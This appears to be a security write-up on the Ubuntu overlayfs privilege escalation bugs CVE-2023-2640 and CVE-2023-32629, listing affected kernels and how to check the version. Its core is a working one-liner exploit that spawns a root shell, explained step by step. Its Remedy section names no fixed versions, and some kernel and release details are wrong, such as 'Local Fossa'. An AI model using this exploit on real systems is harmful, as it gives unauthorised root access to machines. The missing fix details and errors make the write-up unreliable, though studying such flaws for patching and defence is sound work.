Ubuntu could allow a local authenticated attacker to gain elevated privileges on the system, caused by skipping permission checking for trusted.overlayfs.* xattrs". By sending a specially crafted request, an attacker could exploit this vulnerability to escalate privileges.

CVE-2023-2640

https://www.cvedetails.com/cve/CVE-2023-2640/

  • On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.

CVE-2023-32629

https://www.cvedetails.com/cve/CVE-2023-32629/

  • Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels.

Vulnerable kernels

6.2.0 Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish)

5.19.0 Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)

5.4.0 Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)

Identification

1. Verify the OS version

  • lsb_release -a

2. Verify the kernel version

  • uname -r
  • uname -a
  • cat /proc/version

Exploitation

1. Knowing this is a vulnerable version of Ubuntu (6.2.0), we can proceed to run the following command to become root

  • unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'

2. After running this command you should become root

Breakdown

  • unshare -rm sh -c: This command creates a new namespace (-m), and then runs a shell (sh) in this new namespace. The -r option makes the process run in a separate user namespace.
  • "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;": This is the command that is executed in the new namespace. It does the following:
    • mkdir l u w m: Creates four directories - l, u, w, and m.
    • cp /u*/b*/p*3 l/: Copies files matching the pattern /u*/b*/p*3 to the directory l/.
    • setcap cap_setuid+eip l/python3: Sets the cap_setuid capability and eip flag on the python3 binary in the l/ directory.
    • mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m: Mounts an overlay filesystem using the directories l, u, and w. The overlay filesystem allows combining multiple directories into one.
    • touch m/*: Creates empty files in the m/ directory.
    • &&: This is a logical AND operator, which means the next command will be executed only if the previous one succeeds.
    • u/python3 -c 'import os; import pty; os.setuid(0); pty.spawn("/bin/bash")': This command is executed if the previous part is successful. It uses the python3 interpreter located in the directory u/ to execute a Python script. The Python script imports the os and pty modules, sets the user ID to 0 (root), and spawns a new interactive bash shell using pty.spawn("/bin/bash").

Remedy

The problem can be corrected by updating your system to the following package versions:

Sources

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629

https://www.cvedetails.com/cve/CVE-2023-2640/

https://www.cvedetails.com/cve/CVE-2023-32629/

https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation

https://exchange.xforce.ibmcloud.com/vulnerabilities/261608

https://exchange.xforce.ibmcloud.com/vulnerabilities/261608